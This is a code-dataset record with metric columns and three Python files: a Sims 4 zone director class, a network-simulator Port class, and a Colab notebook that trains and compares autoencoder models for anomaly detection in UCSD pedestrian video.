| 0
| 0
| 0.029086
| 1
| 0.01108
| false
| 0
| 0.016621
| 0.001385
| 0.037396
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
575e08c5bbbac7b9f16ee8927985ae10ecdab378
| 288
|
py
|
Python
|
S4/S4 Library/simulation/venues/chalet_garden/chalet_garden_zone_director.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | 1
|
2021-05-20T19:33:37.000Z
|
2021-05-20T19:33:37.000Z
|
S4/S4 Library/simulation/venues/chalet_garden/chalet_garden_zone_director.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | null | null | null |
S4/S4 Library/simulation/venues/chalet_garden/chalet_garden_zone_director.py
|
NeonOcean/Environment
|
ca658cf66e8fd6866c22a4a0136d415705b36d26
|
[
"CC-BY-4.0"
] | null | null | null |
from venues.scheduling_zone_director import SchedulingZoneDirector
from venues.visitor_situation_on_arrival_zone_director_mixin import VisitorSituationOnArrivalZoneDirectorMixin
class ChaletGardenZoneDirector(VisitorSituationOnArrivalZoneDirectorMixin, SchedulingZoneDirector):
pass
| 48
| 110
| 0.920139
| 23
| 288
| 11.173913
| 0.695652
| 0.077821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059028
| 288
| 5
| 111
| 57.6
| 0.948339
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
5774d20f167b5c40fda99f981911ca786bf5cf81
| 270
|
py
|
Python
|
src/port.py
|
pedroeml/network-simulator
|
9fe8e884cda22e532bc75485cfe72bb09d4d946a
|
[
"MIT"
] | null | null | null |
src/port.py
|
pedroeml/network-simulator
|
9fe8e884cda22e532bc75485cfe72bb09d4d946a
|
[
"MIT"
] | null | null | null |
src/port.py
|
pedroeml/network-simulator
|
9fe8e884cda22e532bc75485cfe72bb09d4d946a
|
[
"MIT"
] | null | null | null |
class Port:
def __init__(self, mac_address, ip_address, mtu):
self.mac_address = mac_address
self.ip_address = ip_address
self.mtu = mtu
def __str__(self):
return '(%s - %s - %d)' % (self.mac_address, self.ip_address, self.mtu)
| 27
| 79
| 0.618519
| 38
| 270
| 3.973684
| 0.342105
| 0.264901
| 0.278146
| 0.211921
| 0.304636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.259259
| 270
| 9
| 80
| 30
| 0.755
| 0
| 0
| 0
| 0
| 0
| 0.052045
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
5795b3dd3a0426b7910b5d6fc9b3be0d205e4a58
| 25,766
|
py
|
Python
|
project_code.py
|
sailalitha96/Anamoly-Detection-in-Videos
|
84b10d58aece23dc898e227760e6f4ab46670cf1
|
[
"MIT"
] | null | null | null |
project_code.py
|
sailalitha96/Anamoly-Detection-in-Videos
|
84b10d58aece23dc898e227760e6f4ab46670cf1
|
[
"MIT"
] | null | null | null |
project_code.py
|
sailalitha96/Anamoly-Detection-in-Videos
|
84b10d58aece23dc898e227760e6f4ab46670cf1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Project Code.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1nAMbry1ZCmxpNFVkdPtLueip2rhxWk0_
"""
!pip install mxnet-cu100
import mxnet as mx
from mxnet import nd ,gluon, autograd,gpu
from google.colab import drive
import glob
import numpy as np
import os
from google.colab import drive
from PIL import Image
from scipy import signal
from matplotlib import pyplot as plt
DRIVE_MOUNT='/content/gdrive'
drive.mount(DRIVE_MOUNT)
"""#### **1. CAE:**
**1.1 Training Phase:**
"""
UCSD_FOLDER=os.path.join(DRIVE_MOUNT, 'My Drive', 'UCSD_Anomaly_Dataset.v1p2')
train_files = sorted(glob.glob(UCSD_FOLDER+ '/UCSDped1/Train/*/*'))
train_images = np.zeros((len(train_files),1,100,100))
for idx, filename in enumerate(train_files):
im = Image.open(filename)
im = im.resize((100,100))
train_images[idx,0,:,:] = np.array(im, dtype=np.float32)/255.0
np.save(UCSD_FOLDER+ '/UCSD_Anomaly_Dataset.v1p2.npy',train_images)
class ConvolutionalAutoencoder(gluon.nn.HybridBlock):
def __init__(self):
super(ConvolutionalAutoencoder, self).__init__()
with self.name_scope():
self.encoder = gluon.nn.HybridSequential()
with self.encoder.name_scope():
self.encoder.add(gluon.nn.Conv2D(32, 5, activation='relu'))
self.encoder.add(gluon.nn.MaxPool2D(2))
self.encoder.add(gluon.nn.Conv2D(32, 5, activation='relu'))
self.encoder.add(gluon.nn.MaxPool2D(2))
self.encoder.add(gluon.nn.Dense(2000))
self.decoder = gluon.nn.HybridSequential()
with self.decoder.name_scope():
self.decoder.add(gluon.nn.Dense(32*22*22, activation='relu'))
self.decoder.add(gluon.nn.HybridLambda(lambda F, x: F.UpSampling(x, scale=2, sample_type='nearest')))
self.decoder.add(gluon.nn.Conv2DTranspose(32, 5, activation='relu'))
self.decoder.add(gluon.nn.HybridLambda(lambda F, x: F.UpSampling(x, scale=2, sample_type='nearest')))
self.decoder.add(gluon.nn.Conv2DTranspose(1, kernel_size=5, activation='sigmoid'))
def hybrid_forward(self, F, x):
x = self.encoder(x)
x = self.decoder[0](x)
x = x.reshape((-1,32,22,22))
# print(self.decoder)
x = self.decoder[1](x)
x = self.decoder[2](x)
x = self.decoder[3](x)
x = self.decoder[4](x)
return x
im_train = np.load(UCSD_FOLDER+ '/UCSD_Anomaly_Dataset.v1p2.npy')
batch_size= 32
dataset = gluon.data.ArrayDataset(mx.nd.array(im_train, dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=batch_size, last_batch='rollover',shuffle=True)
ctx = gpu()
num_epochs = 50
model = ConvolutionalAutoencoder()
model.hybridize()
model.collect_params().initialize(mx.init.Xavier('gaussian'), ctx=ctx)
loss_function = gluon.loss.L2Loss()
optimizer = gluon.Trainer(model.collect_params(), 'adam', {'learning_rate': 1e-4, 'wd': 1e-5})
## Training Loop ##
loss_train=[]
for epoch in range(num_epochs):
for image_batch in dataloader:
image = image_batch.as_in_context(ctx)
with mx.autograd.record():
output = model(image)
loss = loss_function(output, image)
loss.backward()
optimizer.step(image.shape[0])
loss_train.append(mx.nd.mean(loss).asscalar())
print('epoch [{}/{}], loss:{:.4f}'.format(epoch + 1, num_epochs, mx.nd.mean(loss).asscalar()))
## Saving model parameters ##
model.save_parameters(UCSD_FOLDER+ "/autoencoder_ucsd.params")
np.save(UCSD_FOLDER+'/loss_train_cae.npy',np.array(loss_train))
"""**1.2 Testing Phase:**"""
test_file = sorted(glob.glob(UCSD_FOLDER +'/UCSDped1/Test/Test024/*'))
test_file_gt = sorted(glob.glob(UCSD_FOLDER +'/UCSDped1/Test/Test024_gt/*'))
a = np.zeros((len(test_file_gt),2,100,100))
for idx,filename in enumerate(test_file):
im = Image.open(filename)
im = im.resize((100,100))
a[idx,0,:,:] = np.array(im, dtype=np.float32)/255.0
for idx,filename in enumerate(test_file_gt):
im = Image.open(filename)
im = im.resize((100,100))
a[idx,1,:,:] = np.array(im, dtype=np.float32)/255.0
dataset = gluon.data.ArrayDataset(mx.nd.array(a, dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=1)
def plot_regularity_score(model,dataloader):
"""
Calculated regularity score per frame:
Regularity Score = 1 - (e_t - min@t(e_t))/max@t(e_t)
where e_t = sum over pixelwise l2 loss for each frame
"""
e_t = []
for image in dataloader:
img = image[:,0,:,:].reshape(1,1,image.shape[-2],image.shape[-1])
img = img.as_in_context(mx.gpu())
output = model(img)
output = (output.asnumpy().squeeze()*255).reshape(100*100,1)
img = (img.asnumpy().squeeze()*255).reshape(100*100,1)
e_xyt = np.linalg.norm(output-img,axis=1,ord=2)
e_t.append(np.sum(e_xyt))
e_t_min = min(e_t)
e_t_max = max(e_t)
reg_scores = []
for i in range(len(e_t)):
reg_scores.append(1 - ((e_t[i]-e_t_min)/e_t_max))
return reg_scores
model = ConvolutionalAutoencoder()
model.load_parameters(UCSD_FOLDER+ "/autoencoder_ucsd.params",ctx=ctx)
reg_scores_cae = plot_regularity_score(model,dataloader)
def plot_anomaly(img, output, diff, H, threshold, counter,UCSD_FOLDER):
"""
Plots the images along the axis to show the input, output of the model,
difference between the 2, and their predicted anomalies as red dots on
the input image.
"""
fig, (ax0, ax1, ax2,ax3) = plt.subplots(ncols=4, figsize=(10, 5))
ax0.set_axis_off()
ax1.set_axis_off()
ax2.set_axis_off()
ax0.set_title('input image')
ax1.set_title('reconstructed image')
ax2.set_title('diff ')
ax3.set_title('anomalies')
ax0.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
ax1.imshow(output, cmap=plt.cm.gray, interpolation='nearest')
ax2.imshow(diff, cmap=plt.cm.viridis, vmin=0, vmax=255, interpolation='nearest')
ax3.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
x,y = np.where(H > threshold)
ax3.scatter(y,x,color='red',s=0.1)
plt.axis('off')
fig.savefig(UCSD_FOLDER+'/images/' + str(counter) + '.png')
def model_evaluation(model,dataloader):
loss_l2_per_frame = []
threshold = 4*255
counter = 0
test_loss_metric = gluon.loss.SigmoidBCELoss()
loss_per_frame = 0
im_list = []
i = 0
for image in dataloader:
counter = counter + 1
img = image[:,0,:,:].reshape(1,1,image.shape[-2],image.shape[-1])
mask = image[:,1,:,:].as_in_context(mx.gpu())
img = img.as_in_context(mx.gpu())
output = model(img)
output = output.transpose((0,2,3,1))
img = img.transpose((0,2,3,1))
output = output.asnumpy()*255
img = img.asnumpy()*255
diff = np.abs(output-img)
tmp = diff[0,:,:,0]
H = signal.convolve2d(tmp, np.ones((4,4)), mode='same')
H_new = mx.nd.array(np.where(H>threshold,1,0).reshape((1,100,100)),ctx=gpu())
loss = test_loss_metric(H_new, mask)
loss_l2_per_frame.append(loss.asscalar())
plot_anomaly(img[0,:,:,0], output[0,:,:,0], diff[0,:,:,0], H, threshold, counter,UCSD_FOLDER)
print("Total loss per frame for anomalies predicted = ",sum(loss_l2_per_frame)/len(dataloader))
## Evaluating the model using the anomaly predictions and regularity scores
model_evaluation(model,dataloader)
"""Saving images as video file:"""
## Saving the output plots as video depicting anomalies ##
import cv2
out_im = sorted(glob.glob(UCSD_FOLDER+ '/images/*.png'))
img_array = []
for filename in out_im:
img = cv2.imread(filename)
height, width, layers = img.shape
# size = (width,height)
img_array.append(img)
size = (360, 720)
_name = UCSD_FOLDER+'/vid' + '.mp4'
# self._cap = VideoCapture(0)
fourcc = cv2.VideoWriter_fourcc(*'MP4V')
out_vid = cv2.VideoWriter(_name,fourcc,15,size)
for i in range(0,199):
out_vid.write(img_array[i])
out_vid.release()
"""#### **2. Spatio- Temporal Layer Stacked CAE:**
**2.1 Training Phase:**
"""
files = sorted(glob.glob(UCSD_FOLDER+'/UCSDped1/Train/*/*'))
train_images = np.zeros((int(len(files)/n), n, 227, 227))
i = 0
idx = 0
for filename in range(0, len(files)):
im = Image.open(files[filename])
im = im.resize((n,n))
a[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
np.save(UCSD_FOLDER + '/stacked_cae.npy',train_images)
class convSTAE(gluon.nn.HybridBlock):
def __init__(self):
super(convSTAE, self).__init__()
with self.name_scope():
self.encoder = gluon.nn.HybridSequential(prefix="encoder")
with self.encoder.name_scope():
self.encoder.add(gluon.nn.Conv2D(512, kernel_size=15, strides=4, activation='relu'))
self.encoder.add(gluon.nn.BatchNorm())
self.encoder.add(gluon.nn.MaxPool2D(2))
self.encoder.add(gluon.nn.BatchNorm())
self.encoder.add(gluon.nn.Conv2D(256, kernel_size=4, activation='relu'))
self.encoder.add(gluon.nn.BatchNorm())
self.encoder.add(gluon.nn.MaxPool2D(2))
self.encoder.add(gluon.nn.BatchNorm())
self.encoder.add(gluon.nn.Conv2D(128, kernel_size=3, activation='relu'))
self.encoder.add(gluon.nn.BatchNorm())
self.decoder = gluon.nn.HybridSequential(prefix="decoder")
with self.decoder.name_scope():
self.decoder.add(gluon.nn.Conv2DTranspose(channels=256, kernel_size=3, activation='relu'))
self.decoder.add(gluon.nn.BatchNorm())
self.decoder.add(gluon.nn.HybridLambda(lambda F, x: F.UpSampling(x, scale=2, sample_type='nearest')))
self.decoder.add(gluon.nn.BatchNorm())
self.decoder.add(gluon.nn.Conv2DTranspose(channels=512, kernel_size=4, activation='relu'))
self.decoder.add(gluon.nn.BatchNorm())
self.decoder.add(gluon.nn.HybridLambda(lambda F, x: F.UpSampling(x, scale=2, sample_type='nearest')))
self.decoder.add(gluon.nn.BatchNorm())
self.decoder.add(gluon.nn.Conv2DTranspose(channels=10, kernel_size=15, strides=4, activation='sigmoid'))
def hybrid_forward(self, F, x):
x = self.encoder(x)
x = self.decoder(x)
return x
ctx = gpu()
im_train = np.load(UCSD_FOLDER + '/stacked_cae.npy')
batch_size=32
dataset = gluon.data.ArrayDataset(mx.nd.array(im_train, dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=batch_size, last_batch='rollover',shuffle=True)
num_epochs = 50
model = convSTAE()
model.hybridize()
model.collect_params().initialize(mx.init.Xavier('gaussian'), ctx=ctx)
loss_function = gluon.loss.L2Loss()
optimizer = gluon.Trainer(model.collect_params(), 'adam', {'learning_rate': 1e-4, 'wd': 1e-5})
## Training Loop ##
loss_train_stacked=[]
for epoch in range(num_epochs):
for image_batch in dataloader:
image = image_batch.as_in_context(ctx)
with mx.autograd.record():
output = model(image)
loss = loss_function(output, image)
loss.backward()
optimizer.step(image.shape[0])
loss_train_stacked.append(mx.nd.mean(loss).asscalar())
print('epoch [{}/{}], loss:{:.4f}'.format(epoch + 1, num_epochs, mx.nd.mean(loss).asscalar()))
## Saving model params ##
model.save_parameters(UCSD_FOLDER+ "/autoencoder_stacked_ucsd.params")
np.save(UCSD_FOLDER+'/loss_train_stacked.npy',loss_train_stacked)
"""**2.2 Testing Phase:**"""
model = convSTAE()
model.load_parameters(UCSD_FOLDER +'/autoencoder_stacked_ucsd.params',ctx=ctx)
batch_size= 1
n=10
test_file = sorted(glob.glob(UCSD_FOLDER+ '/UCSDped1/Test/Test024/*'))
test_file_gt = sorted(glob.glob(UCSD_FOLDER+'/UCSDped1/Test/Test024_gt/*'))
a = np.zeros((int(len(test_file)/n), n, 227, 227))
i = 0
idx = 0
for filename in range(0, len(test_file)):
im = Image.open(test_file[filename])
im = im.resize((227,227))
a[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
b = np.zeros((int(len(test_file_gt)/n), n, 227, 227))
i = 0
idx = 0
for filename in range(0, len(test_file_gt)):
im = Image.open(test_file_gt[filename])
im = im.resize((227,227))
b[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
## Test-time dataloaders for true images and their anomaly masks ##
dataset = gluon.data.ArrayDataset(mx.nd.array(a,ctx= ctx,dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=1)
test_dataset = gluon.data.ArrayDataset(mx.nd.array(b,ctx= ctx, dtype=np.float32))
test_dataloader = gluon.data.DataLoader(dataset, batch_size=1)
def plot_anomaly(img, output, diff, H, threshold, counter,UCSD_FOLDER):
fig, (ax0, ax1, ax2,ax3) = plt.subplots(ncols=4, figsize=(10, 5))
ax0.set_axis_off()
ax1.set_axis_off()
ax2.set_axis_off()
ax0.set_title('input image')
ax1.set_title('reconstructed image')
ax2.set_title('diff ')
ax3.set_title('anomalies')
ax0.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
ax1.imshow(output, cmap=plt.cm.gray, interpolation='nearest')
ax2.imshow(diff, cmap=plt.cm.viridis, vmin=0, vmax=255, interpolation='nearest')
ax3.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
x,y = np.where(H > threshold)
ax3.scatter(y,x,color='red',s=0.1)
plt.axis('off')
fig.savefig('/content/gdrive/My Drive/UCSD_Anomaly_Dataset.v1p2/images_stacked_cae/' + str(counter) + '.png')
def loss_compute(output,image_gt,image,UCSD_FOLDER,counter):
loss_l2_per_frame = []
test_loss_metric = gluon.loss.SigmoidBCELoss(from_sigmoid=False)
# there will be 10 chnannels rep each image flatten them out
output = output.asnumpy().squeeze()*255
image_gt= image_gt.asnumpy().squeeze()
image= image.asnumpy().squeeze()*255
threshold = 4*255
for i in range(0,10):
counter+=1
im_out = output[i,:,:]
im = image[i,:,:]
diff = np.abs(im_out-im)
H = signal.convolve2d(diff, np.ones((4,4)), mode='same')
H_new = mx.nd.array(np.where(H>threshold,1,0).reshape((1,227,227)),ctx=gpu())
mask = mx.nd.array(image_gt[i,:,:].reshape((1,227,227)),ctx=gpu())
loss_l2_per_frame.append(test_loss_metric(H_new,mask).asscalar())
plot_anomaly(im, im_out,diff, H, threshold, counter,UCSD_FOLDER)
return loss_l2_per_frame
def model_evaluation(model,dataloader,test_dataloader,UCSD_FOLDER):
loss = []
im_list = []
counter = 0
for image,image_gt in zip(dataloader,test_dataloader):
output = model(image)
l = loss_compute(output,image_gt,image,UCSD_FOLDER,counter)
counter+=10
loss.extend(l)
print("Total loss per frame for anomalies predicted = ",sum(loss)/len(loss))
model_evaluation(model,dataloader,test_dataloader,UCSD_FOLDER)
def model_evaluation(model,dataloader,test_dataloader,UCSD_FOLDER):
loss = []
im_list = []
counter = 0
for image,image_gt in zip(dataloader,test_dataloader):
output = model(image)
l = loss_compute(output,image_gt,image,UCSD_FOLDER,counter)
counter+=10
loss.extend(l)
print("Total loss per frame for anomalies predicted = ",sum(loss)/len(loss))
model_evaluation(model,dataloader,test_dataloader,UCSD_FOLDER)
"""Saving images as video file:"""
import cv2
images = sorted(glob.glob(UCSD_FOLDER+'/images_stacked_cae/*.png'))
img_array = []
for filename in images:
img = cv2.imread(filename)
height, width, layers = img.shape
img_array.append(img)
file_name = UCSD_FOLDER+'/vid_cae.avi'
fourcc = cv2.VideoWriter_fourcc(*'XVID')
size = (1024,720)
out_vid = cv2.VideoWriter(file_name,fourcc,1,size,3)
for i in range(0,199):
frame = cv2.resize(img_array[i],size)
out_vid.write(frame)
out_vid.release()
"""#### **3. LSTM-Based Stacked CAE:**
**3.1 Training Phase:**
"""
files = sorted(glob.glob(UCSD_FOLDER+'/UCSDped1/Train/*/*'))
train_images = np.zeros((int(len(files)/n), n, 227, 227))
i = 0
idx = 0
for filename in range(0, len(files)):
im = Image.open(files[filename])
im = im.resize((n,n))
a[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
np.save(UCSD_FOLDER + '/stacked_cae.npy',train_images)
class ConvLSTMAE(gluon.nn.HybridBlock):
def __init__(self, **kwargs):
super(ConvLSTMAE, self).__init__(**kwargs)
with self.name_scope():
self.encoder = gluon.nn.HybridSequential()
self.encoder.add(gluon.nn.Conv2D(128, kernel_size=11, strides=4, activation='relu'))
self.encoder.add(gluon.nn.Conv2D(64, kernel_size=5, strides=2, activation='relu'))
self.temporal_encoder = gluon.rnn.HybridSequentialRNNCell()
self.temporal_encoder.add(gluon.contrib.rnn.Conv2DLSTMCell((64,26,26), 64, 3, 3, i2h_pad=1))
self.temporal_encoder.add(gluon.contrib.rnn.Conv2DLSTMCell((64,26,26), 32, 3, 3, i2h_pad=1))
self.temporal_encoder.add(gluon.contrib.rnn.Conv2DLSTMCell((32,26,26), 64, 3, 3, i2h_pad=1))
self.decoder = gluon.nn.HybridSequential()
self.decoder.add(gluon.nn.Conv2DTranspose(channels=128, kernel_size=5, strides=2, activation='relu'))
self.decoder.add(gluon.nn.Conv2DTranspose(channels=10, kernel_size=11, strides=4, activation='sigmoid'))
def hybrid_forward(self, F, x, states=None, **kwargs):
x = self.encoder(x)
x, states = self.temporal_encoder(x, states)
x = self.decoder(x)
return x, states
batch_size=8
dataset = gluon.data.ArrayDataset(mx.nd.array(im_train, dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=batch_size, last_batch='rollover',shuffle=True)
model = ConvLSTMAE()
ctx = gpu()
num_epochs = 50
model.hybridize()
model.collect_params().initialize(mx.init.Xavier(), ctx=mx.gpu())
loss_function = gluon.loss.L2Loss()
optimizer = gluon.Trainer(model.collect_params(), 'adam', {'learning_rate': 1e-4, 'wd': 1e-5})
states = model.temporal_encoder.begin_state(batch_size=batch_size, ctx=ctx)
loss_train_lstm=[]
for epoch in range(num_epochs):
for image_batch in dataloader:
image = image_batch.as_in_context(ctx)
with mx.autograd.record():
output,states = model(image,states)
output = mx.nd.array(output,ctx=gpu())
loss = loss_function(output, image)
loss.backward()
optimizer.step(image.shape[0])
loss_train_lstm.append(mx.nd.mean(loss).asscalar())
print('epoch [{}/{}], loss:{:.4f}'.format(epoch + 1, num_epochs, mx.nd.mean(loss).asscalar()))
model.save_parameters(UCSD_FOLDER+ "/autoencoder_lstm_ucsd.params")
np.save(UCSD_FOLDER+'/loss_train_lstm.npy',loss_train_lstm)
"""**3.2 Testing Phase:**"""
model = ConvLSTMAE()
model.load_parameters(UCSD_FOLDER +'/autoencoder_lstm_ucsd.params',ctx=ctx)
batch_size= 1
n=10
test_file = sorted(glob.glob(UCSD_FOLDER+ '/UCSDped1/Test/Test024/*'))
test_file_gt = sorted(glob.glob(UCSD_FOLDER+'/UCSDped1/Test/Test024_gt/*'))
a = np.zeros((int(len(test_file)/n), n, 227, 227))
i = 0
idx = 0
for filename in range(0, len(test_file)):
im = Image.open(test_file[filename])
im = im.resize((227,227))
a[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
b = np.zeros((int(len(test_file_gt)/n), n, 227, 227))
i = 0
idx = 0
for filename in range(0, len(test_file_gt)):
im = Image.open(test_file_gt[filename])
im = im.resize((227,227))
b[idx,i,:,:] = np.array(im, dtype=np.float32)/255.0
i = i + 1
if i >= n:
idx = idx + 1
i = 0
## Test-time dataloaders for true images and their anomaly masks ##
dataset = gluon.data.ArrayDataset(mx.nd.array(a,ctx= ctx,dtype=np.float32))
dataloader = gluon.data.DataLoader(dataset, batch_size=1)
test_dataset = gluon.data.ArrayDataset(mx.nd.array(b,ctx= ctx, dtype=np.float32))
test_dataloader = gluon.data.DataLoader(dataset, batch_size=1)
def plot_anomaly(img, output, diff, H, threshold, counter,UCSD_FOLDER):
fig, (ax0, ax1, ax2,ax3) = plt.subplots(ncols=4, figsize=(10, 5))
ax0.set_axis_off()
ax1.set_axis_off()
ax2.set_axis_off()
ax0.set_title('input image')
ax1.set_title('reconstructed image')
ax2.set_title('diff ')
ax3.set_title('anomalies')
ax0.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
ax1.imshow(output, cmap=plt.cm.gray, interpolation='nearest')
ax2.imshow(diff, cmap=plt.cm.viridis, vmin=0, vmax=255, interpolation='nearest')
ax3.imshow(img, cmap=plt.cm.gray, interpolation='nearest')
x,y = np.where(H > threshold)
ax3.scatter(y,x,color='red',s=0.1)
plt.axis('off')
fig.savefig('/content/gdrive/My Drive/UCSD_Anomaly_Dataset.v1p2/images_stacked_lstm/' + str(counter) + '.png')
def loss_compute(output,image_gt,image,UCSD_FOLDER,counter):
loss_l2_per_frame = []
test_loss_metric = gluon.loss.SigmoidBCELoss(from_sigmoid=False)
# there will be 10 chnannels rep each image flatten them out
output = output.asnumpy().squeeze()*255
image_gt= image_gt.asnumpy().squeeze()
image= image.asnumpy().squeeze()*255
threshold = 4*255
for i in range(0,10):
counter+=1
im_out = output[i,:,:]
im = image[i,:,:]
diff = np.abs(im_out-im)
H = signal.convolve2d(diff, np.ones((4,4)), mode='same')
H_new = mx.nd.array(np.where(H>threshold,1,0).reshape((1,227,227)),ctx=gpu())
mask = mx.nd.array(image_gt[i,:,:].reshape((1,227,227)),ctx=gpu())
loss_l2_per_frame.append(test_loss_metric(H_new,mask).asscalar())
plot_anomaly(im, im_out,diff, H, threshold, counter,UCSD_FOLDER)
return loss_l2_per_frame
def model_evaluation(model,dataloader,test_dataloader,UCSD_FOLDER,states):
counter = 0
loss = []
im_list = []
i = 0
for image,image_gt in zip(dataloader,test_dataloader):
output,_ = model(image,states)
l = loss_compute(output,image_gt,image,UCSD_FOLDER,counter)
counter+=10
loss.extend(l)
print("Total loss per frame for anomalies predicted = ",sum(loss)/len(loss))
## Evaluating the model using the anomaly predictions and regularity scores
states = model.temporal_encoder.begin_state(batch_size=batch_size, ctx=ctx)
model_evaluation(model,dataloader,test_dataloader,UCSD_FOLDER,states)
"""Saving images as video file:"""
import cv2
images = sorted(glob.glob('/content/gdrive/My Drive/UCSD_Anomaly_Dataset.v1p2/images_stacked_lstm/*.png'))
img_array = []
for filename in images:
img = cv2.imread(filename)
height, width, layers = img.shape
img_array.append(img)
file_name = UCSD_FOLDER+'/vid_lstm_cae.avi'
fourcc = cv2.VideoWriter_fourcc(*'XVID')
size = (1024,720)
out_vid = cv2.VideoWriter(file_name,fourcc,1,size,3)
for i in range(0,199):
frame = cv2.resize(img_array[i],size)
out_vid.write(frame)
out_vid.release()
"""#### **4. Regularity Scores Comparison:**"""
def plot_regularity_score_on_stacked_images(model,dataloader,states=None,lstm=False):
"""
Calculated regularity score per frame:
Regularity Score = 1 - (e_t - min@t(e_t))/max@t(e_t)
where e_t = sum over pixelwise l2 loss for each frame
"""
e_t = []
for image in dataloader:
img = image.as_in_context(gpu())
if lstm:
output ,_ = model(img,states)
else:
output = model(img)
output = output.asnumpy().squeeze()*255
img = img.asnumpy().squeeze()*255
for i in range(output.shape[0]):
a = output[i,:,:].reshape(227*227,1)
b = img[i,:,:].reshape(227*227,1)
e_xyt = np.linalg.norm(a-b,axis=1,ord=2)
e_t.append(sum(e_xyt))
e_t_min = min(e_t)
e_t_max = max(e_t)
reg_scores = []
for i in range(len(e_t)):
reg_scores.append(1 - ((e_t[i]-e_t_min)/e_t_max))
return reg_scores
model_stcae = convSTAE()
model_stcae.load_parameters(UCSD_FOLDER +'/autoencoder_stacked_ucsd.params',ctx=ctx)
model_lstm = ConvLSTMAE()
model_lstm.load_parameters(UCSD_FOLDER +'/autoencoder_lstm_ucsd.params',ctx=ctx)
reg_scores_stcae = plot_regularity_score_on_stacked_images(model_stcae,dataloader,lstm=False)
states = model_lstm.temporal_encoder.begin_state(batch_size=batch_size, ctx=ctx)
reg_scores_lstm = plot_regularity_score_on_stacked_images(model_lstm,dataloader,states,lstm=True)
## Plots
plt.plot(reg_scores_cae,color ='red')
plt.plot(reg_scores_stcae,color = 'green')
plt.plot(reg_scores_lstm,color='blue')
plt.xlabel("frame number")
plt.ylabel("regularity score")
plt.title( "Regularity Score per frame")
plt.legend(['CAE','STCAE', 'LSTM-STCAE'])
plt.show()
"""#### **5. Training Loss Comparison:**"""
loss_train = np.load(UCSD_FOLDER+'/loss_train_cae.npy')
loss_train_stacked = np.load(UCSD_FOLDER+'/loss_train_stacked.npy')
loss_train_lstm = np.load(UCSD_FOLDER+'/loss_train_lstm.npy')
plt.plot(loss_train,'r')
plt.plot(loss_train_stacked,'g')
plt.plot(loss_train_lstm,'b')
plt.title('Training Loss vs Epochs')
plt.legend(['CAE','STCAE','LSTM-STCAE'])
plt.xlabel('epoch')
plt.ylabel('reconstruction loss')
plt.show()
| 38.399404
| 121
| 0.661608
| 3,781
| 25,766
| 4.356784
| 0.094684
| 0.031567
| 0.020033
| 0.019608
| 0.842955
| 0.815334
| 0.775815
| 0.737449
| 0.715777
| 0.690099
| 0
| 0.037213
| 0.183381
| 25,766
| 671
| 122
| 38.399404
| 0.745687
| 0.024257
| 0
| 0.711069
| 1
| 0
| 0.08231
| 0.030056
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.02439
| null | null | 0.013133
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
17eee6ad87e3cf1b03ac559a32f34fbc0d52c3b1
| 47,566
|
py
|
Python
|
tests/snapshots/snap_promgen_k8s_test.py
|
cmur2/promgen-k8s
|
df44928071896376f2c0263723aab8a8033f6263
|
[
"Apache-2.0"
] | 12
|
2017-09-13T11:50:01.000Z
|
2022-01-06T05:10:55.000Z
|
tests/snapshots/snap_promgen_k8s_test.py
|
cmur2/promgen-k8s
|
df44928071896376f2c0263723aab8a8033f6263
|
[
"Apache-2.0"
] | 8
|
2017-12-04T11:33:23.000Z
